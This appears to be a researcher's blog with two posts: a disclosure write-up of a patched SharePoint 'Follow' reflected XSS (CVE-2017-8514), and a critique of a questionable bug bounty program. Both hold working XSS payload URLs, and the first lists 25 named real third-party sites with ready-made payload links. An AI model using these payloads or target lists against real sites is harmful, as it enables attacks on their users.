A Look at CVE-2017-8514 --- SharePoint's `Follow` Feature XSS

TL;DR: All your SharePoint installations are belong to us. The XSS (worth $2500) affecting both on-premises and online version looks like ...

http|https://<Any SharePoint URL Goes Here>?FollowSite=0&SiteName='-confirm(document.domain)-'

SharePoint needs no more marketing given it is one of the most popular enterprise content management systems. According to Redmond Magazine: "SharePoint and OneDrive are used by more than 75,000 customers, with more than 160 million users.". I am not a SharePoint MVP but as far as I can see, it comes in two flavors i.e., SharePoint on-premises and SharePoint online. Organizations prefer to use the on-premises model given it is in general only accessible over the intranet or internal network.  

One common use-case that I have seen or experienced in the organization is: There are many teams working in an organization for a day-to-day job e.g., HR, Marketing, Application, Legal and/or Security team etc. In SharePoint, one can have a dedicated site or page for a respective team where they can share relevant stuff (e.g., documents, news etc.) among team members and at the same time sharing outside the team is also possible. SharePoint provides fine-grained permission levels and role-based access control. 

SharePoint is all about sharing. In this line of direction, SharePoint provides a feature called "Follow" a site in order to get updates on site's activity in your newsfeed. One way to follow a site is to click on the "Follow" feature available at the top right of the page. It looks like ...

At this time, SharePoint sends a POST request to the following end-point: bbmsft.sharepoint.com/_vti_bin/client.svc/ProcessQuery (bbmsft is the tenant name in my case and this will be different in your case). I played around with that POST request but was unable to find something interesting. I observed that this is not the only way to follow a site. You can also share your site(s) with others by using the Share feature available at the top right corner. Once you send out Share invitation, on the receiving end email looks like ...

The "Follow" feature as a part of email's content is now available in the form of a GET request. The URL at that time looks like:

https://bbmsft.sharepoint.com/?FollowSite=1&SiteName=<AnySiteNameGoesHere>

The URL has two GET parameters i.e., FollowSite=1 and SiteName=<AnySiteNameGoesHere>. The FollowSite GET parameter holds a Boolean value of 0 or 1. 0 for not following and 1 for following. It is a sort of flag. The GET parameter SiteName is of our interest. It is reflected back as a part of script context like the following (watch out for the keyword ReflectionHere). In real life, this would be the name of site you want to follow.

<script type="text/javascript">

//<![CDATA[

...

SP.SOD.executeFunc('followingcommon.js', 'FollowSiteFromEmail', function() { FollowSiteFromEmail('ReflectionHere'); });

...

//]]>

</script>

As you can see in the above code, the developers're using single quote around ReflectionHere and I found that potentially dangerous characters like ', <, > and / etc were not encoded. In order to keep it simple, the XSS payload like '-confirm(document.domain)-' should do the job for you. Further, I noticed that the above inline JavaScript code snippet only appears or  becomes a part of DOM if GET parameters (FollowSite and SiteName) are present in the URL. The screen-shot is given below.

A quick PoC of this XSS on one of the test-bed I had ...

Situation In the Wild:

The XSS looks simple because it only needs a SharePoint URL and simply add two GET parameters with one hold the XSS payload like:

http[s]://<SHAREPOINT URL>?FollowSite=0&SiteName='-confirm(document.domain)-'

Google dorking (inurl:SitePages/Home.aspx?) for SharePoint Home Page shows 19,000+ results. The SharePoint site's home page has a general format like http(s)://<Any SharePoint URL>/SitePages/Home.aspx. Some notable and vulnerable examples I was able to identify quickly from Google Dorks are given below. If you have a SharePoint site and you can see "Follow" feature on the page, than there is a great chance that you are vulnerable. Please keep in mind that following examples (Govt. sites, agencies, universities and colleges) does not include on-premises SharePoint installations.

1. https://espace2013.cern.ch/ls1planning/sitepages/home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
2. https://info.undp.org/gssu/onlinetools/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27 
3. http://www.karnataka.gov.in/Pages/kn.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27 
4. https://web.fnal.gov/organization/Finance/business/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27 
5. https://ocexternal.olympic.edu/PSNSOCoffice/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
6. https://www.whi.org/researchers/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
7. http://www.mapnagenerator.com/en/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
8. https://gnssn.iaea.org/NSNI/PoS/IGALL/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
9. http://www.mapnagenerator.com/en/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
10. https://www.adced.ae/sites/EN/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27 
11. https://www-scotland.k12.sd.us/library/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
12. http://hec.gov.pk/Urdu/scholarshipsgrants/IPHDFP5000F/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
13. https://info.spcollege.edu/Community/AP/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
14. https://www.blr.aero/Airlines/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
15. http://www.irti.org/English/Events/11th%20IDB%20Global%20Forum%20on%20Islam/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
16. https://www.ead.ae/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
17. https://my.queens.edu/its/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
18. http://www.skylineuniversity.ac.ae/sites/SUC/Portal/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
19. https://www.dmacc.edu/urban/sac/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
20. http://nfm.mjs.bg/NFMs/EN/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
21. https://cowork.us.extranet.lenovo.com/promotions/nax86vug/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
22. https://www.utp.edu.my/Academic/CSIMAL/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
23. https://rcilab.in/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
24. https://www.sgsts.org.uk/governor/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
25. https://portal.veic.org/sunshot/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27

Timeline and Bounty:

Reported to Microsoft on secure@microsoft.com: 20th February 2017
Triaged and Case # Assigned email from secure@microsoft.com: 20th February 2017 and Case # was 37482
Case Reproduction Email Confirmation from secure@microsoft.com: 28th February 2017
Bounty Qualifying Email from secure@microsoft.com on 9th March 2017.
10th March 2017, email from bounty@microsoft.com regarding the bounty amount which was $2500.

On 9th June 2017, I received an email regarding fix and patch will be released as a part of June 2017 updates. Here is the link to CVE-2017-8514: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8514. Microsoft has also released a fix for a stored XSS I found in SharePoint Project Web App. CVE-2017-8551  https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8551 is related to that. I will try to do a write-up on that later.    

I think, it's time to go and patch your SharePoint.

Gone in Few Hours: Infooby's Fake or Questionable Bug Bounty Program

Bug bounty programs are great in many folds: learning perspective, monetary benefits for bug hunters and a step towards safe and secure web applications. Bug bounty programs are a win-win situation for both parties i.e., bug hunter(s) and the organization(s). The bug bounty hunters get money/reward (or entry in a hall of fame) for finding and reporting legitimate bugs, improve their pentesting skills by looking at the live targets and at the same time organizations improve their security by fixing the bugs reported by bug hunters around the world. Please keep in mind that bug hunters have different skills-set, mind-set and culture so organizations receive a variety of reports including high quality stuff. 

I like participating in bug bounty programs in my free and spare time (though I am not very active). Few days ago, when I was reading my Twitter feed, I came across the following Tweet by @disclosedh1.

"Curiosity killed the cat". I thought lets look at Infooby's web application for quick XSSing because in the program announcement (now gone and no more available), they're interested in having XSS reports. Initially, I have no idea that Infooby're acting maliciously and these guys have announced the program only to have the reports so that they can fix it and improve their web application. They wanted to have a win situation but only for them. One aspect of bug bounty program's announcement is marketing stunt or getting a media attention. I think Infooby wants limelight.

In a matter of few minutes, I found 2 XSS issues in their web application and reported these (#130596 & #130733) via Hackerone. One of the XSS is still live. Open the following URL in Firefox browser.

https://infooby.com/?next=%22%3E%3Cimg%20src=x%20onerror=confirm%281%29;%3E   

The screen-shot is also given below. The other XSS was here (now I think they fixed it): https://infooby.com/places?address="><img src=x onerror=prompt(1);>.

I found 2 XSSes in quick time so I thought there're many more and I wanted to continue testing but soon started getting the error message i.e., "Resource limit is reached" and/or 508 status code and/or even site was getting down again and again. It shows that Infooby is not fully prepared for the initial onslaught from the HackerOne's community. The homework from Infooby's side was missing because if you will announce the bug bounty program, there is a great chance that several people will immediately start scanning your web application with the help of automation tools (may be as a part of initial and quick probe). The automation tools mean bombardment of attack payloads. The other testers have also noticed the error message and in the meantime, Infooby awarded someone a 20$ bounty but in the program announcement, they had mentioned the minimum bounty amount will be 50$. Meanwhile the Infooby's main site was going down and up again and again because of ongoing testing from the community.

On the next day, I received an email from HackerOne regarding the status of Infooby's bug bounty program. In short, it was no longer there. The contents of the email can be seen in the screen-shot.

It raises the following questions in my mind and still there are no clear answers. How can we stop this type of thing or fake/questionable bounty program in the future? What mediators or facilitators like HackerOne and BugCrowd can do in this regard? What happened to the bug reports (current status is "Not Applicable") Infooby had received in the meantime and Isn't they will fix bugs for free?
 
I think we can not stop announcement of fake bug bounty program(s) given if it is announced on the company's own web page. Any web site can do this and no one from outside can ask a question about its credibility given it is the company's sole jurisdiction. The bug bounty mediation/facilitator platforms like HackerOne and BugCrowd still can do something like e.g., "security deposit for guarantee or best practices". The idea is same as we see in real life e.g., if we rent a house or apartment, we used to pay some deposit and at the time of leaving the house, we normally get the money back. HackerOne and BugCrowd should ask for this deposit money in order to make sure that company is serious in bug bounty program and if in case company does some questionable practices, HackerOne and BugCrowd may take the money from this deposit or pool and distribute it to the valid bug submitters. If there will be a pool of money like that (e.g., initially it can be a pool of 5K USD per bug bounty program announcement) than there will be no more free bugs even if the bug bounty program is gone or vanish. This pool of money will motivate both parties to work in a best possible way.

Now a days, in general, we (i.e., bug submitters) participate in a bug bounty program like a race. We try to find bugs (especially low hanging fruits) as soon as possible, immediately after the program announcement, without keeping an eye on how genuine a bounty program is. I think this is the wrong approach at the moment (unless we have a deposit or pool as I mentioned earlier) given we do not know in start how reputable a program is. Believe me, the bugs are there and it is not necessarily to treat it like a race. Trust in your capabilities and you will find bugs given you will have enough motivation. Happy Hunting.

Note: If you guys have any other good idea on how can we stop fake program(s) or wants to share your bad experience(s) with the bug bounty program(s), please feel free to comment.